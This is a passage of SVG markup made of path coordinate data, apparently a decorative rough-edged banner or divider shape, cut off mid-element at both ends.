45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path 